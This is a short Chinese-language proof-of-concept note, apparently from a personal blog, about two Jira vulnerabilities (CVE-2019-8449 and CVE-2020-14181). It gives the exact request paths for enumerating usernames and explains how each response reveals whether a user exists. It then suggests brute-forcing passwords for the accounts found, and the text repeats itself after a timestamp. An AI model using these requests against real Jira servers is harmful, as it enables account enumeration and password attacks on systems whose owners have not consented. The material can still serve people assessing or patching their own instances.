俩CVE
POC
CVE-2019-8449: /rest/api/latest/groupuserpicker?query=$username
CVE-2020-14181: /secure/ViewUserHover.jspa?username=$username
这俩洞都是枚举用户的
CVE-2019-8449
这个会返回些信息
CVE-2020-14181
这个不存在就会exist
然后可以靠枚举出来的用户进行爆破啦
2024-01-18 13:51:16
CVE-2019-8449: /rest/api/latest/groupuserpicker?query=$username
CVE-2020-14181: /secure/ViewUserHover.jspa?username=$username
这俩洞都是枚举用户的
这个会返回些信息
这个不存在就会exist
然后可以靠枚举出来的用户进行爆破啦